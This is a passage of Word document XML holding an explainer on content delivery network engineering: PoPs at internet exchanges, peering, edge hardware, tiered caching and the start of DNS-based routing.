    </w:p>
    <w:p w14:paraId="7589CB46" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What a CDN Actually Is (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4248343D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>A CDN is not simply "servers closer to users." That definition describes the physical deployment but completely misses the engineering depth. A CDN is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>globally distributed infrastructure layer that intercepts, processes, and serves internet traffic at the network edge</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> — as close to end users as physically possible — while providing caching, security, performance optimization, reliability, and traffic management capabilities that would be impossible or prohibitively expensive to replicate at a single origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6708F315" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The engineering problems a CDN solves are fundamental physical constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D624E2F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Speed of Light Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Light travels through fiber optic cable at approximately 200,000 km/second (2/3 the speed of light in vacuum due to the refractive index of glass). A round trip from Tokyo to a Virginia data center (15,000km round trip) takes a minimum of </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>75ms</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> — irreducible by any amount of server optimization. A CDN edge node in Tokyo reduces this to ~2ms. No software optimization, no hardware upgrade, no architectural change at the origin can overcome propagation delay. Only geographic proximity can.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E4DF3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The Fan-Out Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> A viral event — a product launch, a breaking news story, a major sporting event ending — generates millions of simultaneous requests for identical content. A single origin cluster, regardless of its scale, cannot serve millions of concurrent requests for the same bytes without catastrophic degradation. CDNs convert this many-to-one fan-out into a small number of origin fetches by serving cached content from thousands of edge locations simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE113D4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Last-Mile Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> The internet backbone between major cities has enormous capacity. The constraint is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>last mile</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> — the connection between the ISP's local point of presence and the end user. CDN edge nodes co-located at internet exchanges peer directly with ISPs, placing content as close to the last mile as possible and eliminating backbone traversal entirely for most traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C2A0D3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The DDoS Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Volumetric attacks generate traffic in the Tbps range — far beyond any single origin's ability to absorb. A globally distributed CDN with Anycast routing spreads attack traffic across hundreds of PoPs, each absorbing a manageable fraction. The aggregate capacity of a major CDN's infrastructure (50–100+ Tbps) dwarfs any individual attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0C5BF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Understanding CDNs requires understanding all of these dimensions simultaneously — caching, routing, security, performance optimization, and reliability — because they are deeply interdependent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF1D67" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="23D54626">
          <v:rect id="_x0000_i4550" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A803A2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. CDN Architecture — The Physical and Logical Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA04A92" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Points of Presence (PoPs) — The Physical Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7359B261" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>A CDN's PoP (Point of Presence) is a physical facility — typically co-located at an </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>internet exchange (IX)</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> or carrier-neutral colocation facility — containing servers, storage, networking equipment, and high-capacity internet connectivity to multiple upstream providers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531D3071" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why internet exchange co-location is critical:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D84CF9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>An internet exchange is a physical location where ISPs, content networks, and transit providers interconnect and exchange traffic. DE-CIX (Frankfurt), AMS-IX (Amsterdam), LINX (London), NYIIX (New York), JPNAP (Tokyo) — these exchanges handle petabits per second of traffic. A CDN PoP at an exchange connects directly to hundreds of ISPs via </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>settlement-free peering</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> — traffic flows between the CDN and ISP without per-byte costs and with minimal latency (microseconds at the exchange's switching fabric rather than milliseconds across the internet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020DB1D8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The peering economics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626C6696" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>When a user's ISP peers directly with the CDN at an exchange, the traffic path is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A86E65" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA00ABC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>User → ISP's local network → Exchange switching fabric → CDN PoP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C89374" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Total network cost: near zero (peering is settlement-free). Total latency: dominated by the last-mile connection, not backbone traversal. This is why CDNs aggressively pursue peering relationships — each peering agreement reduces costs and latency simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECDBC14" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The PoP hardware for high-throughput serving:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B53D88" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>A modern CDN edge server is purpose-built:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05066466" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CPU:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> 64–128 cores for massively parallel request handling. Serving cached content is embarrassingly parallel — each request independently reads from cache and writes to the socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6146564C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RAM:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> 256GB–2TB for the hot cache tier. Sub-microsecond access. The most popular content is pinned in RAM and never touches disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6269991E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NVMe SSD:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> 20–200TB per server for the warm cache tier. ~100µs access time. Stores the broader working set that doesn't fit in RAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0824093D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NIC:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> 100Gbps or 400Gbps network cards. At these speeds, standard Linux kernel networking cannot keep up — packet arrival rate exceeds what the interrupt-driven kernel network stack can process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69832DDE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1203"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kernel bypass (DPDK, XDP, io_uring):</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> High-performance CDN software bypasses the kernel entirely for packet processing. At 400Gbps with 1500-byte packets, approximately 33 million packets arrive per second — one every 30 nanoseconds. No interrupt-driven system can handle this. DPDK (Data Plane Development Kit) and XDP (eXpress Data Path) process packets in user space or at the NIC driver level, handling millions of packets per core per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68838D24" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tiered PoP architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CA82B6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDNs organize infrastructure hierarchically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0905316C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2745C3A5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6F4864" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  ↓ ~2ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A38E7B0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Edge PoP (Tier 1) — Thousands of locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541D3017" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  1–50 servers, 10–400Gbps, ~10–100TB storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECAC46F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Serves the hottest content from RAM/SSD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DECD9C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Cache miss → fetch from parent tier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5582BA1B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132A6EE2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ↓ ~10ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEC9C1B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Regional PoP (Tier 2) — Hundreds of locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592DA700" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  50–500 servers, 1–10Tbps, ~1–10PB storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476C9A1E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Larger cache → higher hit rate for long-tail content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61590D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Aggregates misses from multiple edge PoPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA20DA2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Cache miss → fetch from origin shield</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF1C563" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E3006" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ↓ ~30ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F50D7A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin Shield (Tier 3) — Tens of strategic locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3412DD1C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  500–5000 servers, 10–100Tbps, ~10–100PB storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B94234" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Last cache layer before origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282DA639" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Collapses thousands of edge misses into single origin requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4EB0AB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DC99C4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ↓ Variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2503C19B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin — Customer's infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C272323" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The bandwidth amplification of tiering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247BC8AA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCDD828" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Scenario: 10 million users request the same 5MB video segment simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EA4B6C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="515C66B8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Without tiering (all misses hit origin):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DD7DAE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  5,000 edge PoPs × one miss each = 5,000 origin requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2B5813" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  5,000 × 5MB = 25GB fetched from origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DE9EE8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="1882E122" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>With tiering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70038753" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  5,000 edge misses → 500 regional misses → 10 origin shield misses → 1 origin request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526B8146" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  1 × 5MB = 5MB fetched from origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014B39AB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="3DF0036D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Bandwidth reduction: 25GB → 5MB = 5,000× reduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC0502E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>This is the compounding benefit of hierarchical caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD0C302" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="47F0E03E">
          <v:rect id="_x0000_i4551" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D61CCF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. How Traffic Reaches the CDN — Routing Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1C1F6C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS-Based Routing (GeoDNS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EE2D35" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The most common CDN onboarding model: the customer delegates their domain's DNS (or a subdomain) to the CDN's nameservers, or creates a CNAME to a CDN hostname:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C48FBDB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F2E3D7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>www.example.com.  CNAME  example.cdn-provider.net.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1B7C81" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>example.cdn-provider.net.  A  203.0.113.5  (Tokyo PoP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C84530F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>example.cdn-provider.net.  A  198.51.100.3  (London PoP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B731308" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>When a client resolves www.example.com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ADF6AC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1204"/>
        </w:numPr>
      </w:pPr>
